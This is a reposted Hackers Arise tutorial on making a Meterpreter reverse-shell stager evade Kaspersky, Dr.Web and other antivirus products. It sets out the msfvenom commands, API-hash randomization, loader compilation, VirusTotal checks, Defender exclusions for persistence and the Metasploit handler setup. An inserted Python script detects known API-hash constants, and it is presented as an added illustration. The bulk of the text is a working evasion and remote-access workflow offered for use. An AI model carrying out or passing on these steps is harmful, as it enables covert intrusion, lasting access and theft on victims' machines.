The post Malware Evasion – Evading Russian Antiviruses first appeared on Hackers Arise.

Welcome back warriors. It’s Overwatch here again. Today we’ll walk through one of the obfuscation methods we use during engagements. This time, we’re bypassing well-known Russian antivirus software like Kaspersky, DrWeb, and others that might be running on a typical system. This process is called evasion. The goal is to stay quiet, avoid detection, and keep control of your shell for as long as possible.
As you may know, there are ways to get a reverse shell through PowerShell or CMD using native Windows binaries. The issue is that antivirus software often monitors these methods. Even if it lets them through at first, the session usually gets killed shortly after. Instead, we’ll be using an obfuscated Meterpreter stager, which gives you full control of the system from socks and hash dumping to screenshots and everything else Meterpreter offers out of the box.
Generating a Stager
First, generate your stager using msfvenom. This is a standard step.
kali > msfvenom -p windows/meterpreter/reverse_tcp LHOST=
If your target is x64, use the correct payload for that architecture:
kali > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=

Randomizing API Hashes
Next, remove known indicators of compromise (IoCs) from your stager. These are the fixed patterns or strings AV tools look for, in this case the 32-bit API hash constants the stager uses to resolve Windows functions. By replacing them with randomized values, you avoid basic signature-based detection.
Start by cloning the hash randomizer tool from GitHub:
kali > git clone https://github.com/embee-research/Randomise-api-hashes-cobalt-strike

Run the tool against your stager. It will find and replace known IoCs with consistent but random values.
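From the detection side, the reason the randomizer matters is that an unmodified stager carries fixed 32-bit API hash constants that a scanner can match literally. The following Python script is added here as an illustration; it is not part of the original post or of the randomizer tool. It assumes the widely documented ROR13 scheme (module name uppercased as UTF-16, function name as ASCII, both with their terminating null, the two hashes summed), computes the constants for imports a reverse_tcp stager typically resolves, and scans a constructed byte blob for them. Before using any computed value in a production rule, cross-check it against a trusted published reference.

```python
import struct
from typing import List, Tuple

# Assumption: the stager resolves APIs with the ROR13 scheme used by
# Metasploit-style block_api code. Module names are hashed uppercased as
# UTF-16LE including the terminating null, function names as ASCII including
# the terminating null, each byte applied as rotate-right-13 then add, and
# the two results are summed modulo 2^32.
MASK = 0xFFFFFFFF


def ror13(data: bytes) -> int:
    """Rotate-right-13 accumulator over a byte sequence."""
    h = 0
    for b in data:
        h = ((h >> 13) | (h << 19)) & MASK
        h = (h + b) & MASK
    return h


def api_hash(module: str, function: str) -> int:
    """32-bit constant the stager compares against while walking export tables."""
    mod_bytes = module.upper().encode("utf-16-le") + b"\x00\x00"
    fn_bytes = function.encode("ascii") + b"\x00"
    return (ror13(mod_bytes) + ror13(fn_bytes)) & MASK


# Imports a reverse_tcp stager typically resolves; one match is enough to flag.
KNOWN_IMPORTS = [
    ("kernel32.dll", "LoadLibraryA"),
    ("ws2_32.dll", "WSAStartup"),
    ("ws2_32.dll", "WSASocketA"),
    ("ws2_32.dll", "connect"),
    ("ws2_32.dll", "recv"),
    ("kernel32.dll", "VirtualAlloc"),
]


def scan_for_api_hashes(blob: bytes, imports=KNOWN_IMPORTS) -> List[Tuple[int, str, str, int]]:
    """Return (offset, module, function, hash) for every known constant found in blob."""
    hits = []
    for module, function in imports:
        h = api_hash(module, function)
        needle = struct.pack("<I", h)  # stored little-endian, e.g. as a PUSH imm32 operand
        start = 0
        while True:
            idx = blob.find(needle, start)
            if idx < 0:
                break
            hits.append((idx, module, function, h))
            start = idx + 1
    return sorted(hits)


def constructed_sample(randomized: bool) -> bytes:
    """Constructed stand-in for a stager, not real shellcode: NOP filler plus
    two PUSH imm32 instructions carrying API hash constants. With randomized=True
    the constants are replaced by a constructed substitute (XOR with a fixed mask)
    to mimic what a hash randomizer does to the literal values; a real tool also
    has to patch the resolver so it computes the new values, which is omitted here."""
    pairs = [("kernel32.dll", "LoadLibraryA"), ("ws2_32.dll", "WSAStartup")]
    out = b"\x90" * 8
    for module, function in pairs:
        h = api_hash(module, function)
        if randomized:
            h ^= 0xA5A5A5A5  # constructed substitution, not the tool's actual output
        out += b"\x68" + struct.pack("<I", h) + b"\xff\xd5"  # push imm32 ; call ebp
    return out


if __name__ == "__main__":
    for label, blob in (("unmodified", constructed_sample(False)),
                        ("randomized", constructed_sample(True))):
        hits = scan_for_api_hashes(blob)
        print(f"{label}: {len(hits)} known API hash constant(s) found")
        for off, module, function, h in hits:
            print(f"  offset {off:#06x}: {module}!{function} = {h:#010x}")
```

The literal match is exactly what the randomizer defeats, which is why a detection strategy that relies on it alone is brittle; behavioural indicators (an unsigned binary allocating executable memory and opening an outbound socket) survive constant substitution.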
Copy the Payload
Once your payload is obfuscated, copy the output so it can be embedded in an executable. You'll need xxd to convert the binary into a C-style array:
kali > xxd -i file.bin_0x69.bin

Crafting a Loader
Next, craft a simple loader in C. This loader will contain your obfuscated payload, so make sure to paste it correctly.

Compiling an Executable
Once the loader is ready, compile it using mingw-w64.
kali > x86_64-w64-mingw32-gcc loader.c -o loader.exe

Now you’ve got your executable. Time to test it.
Checking Detection
Upload the compiled loader to VirusTotal. The obfuscated payload should evade Kaspersky, Dr.Web, ESET, and Malwarebytes. These are among the more commonly deployed AV solutions in Russian environments.


Be aware: Microsoft Defender might still flag it. In some cases, adding .exe files to Defender exclusions will allow your payload to run without being stopped. If you’re in a situation where you control exclusions, this method works well for persistence.
To compare, upload a basic Meterpreter stager without hash randomization to VirusTotal. You’ll see a major difference in detection rates.

Delivery and Execution
Deliver your executable to the target machine using any method you prefer.
Set up a listener in Metasploit to catch the connection:
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST
msf6 > set LPORT
msf6 > run

Once the executable runs, you’ll get a Meterpreter session.
Conclusion
This method is quick, simple, and effective. It avoids traditional detection and doesn’t take much time to set up. Malware evasion can get a lot more advanced, especially when it involves C# and reverse engineering. But this technique is enough to stay off the radar in Russian environments and keep your access alive.
Source: HackersArise
Source Link: https://hackers-arise.com/malware-evasion-evading-russian-antiviruses/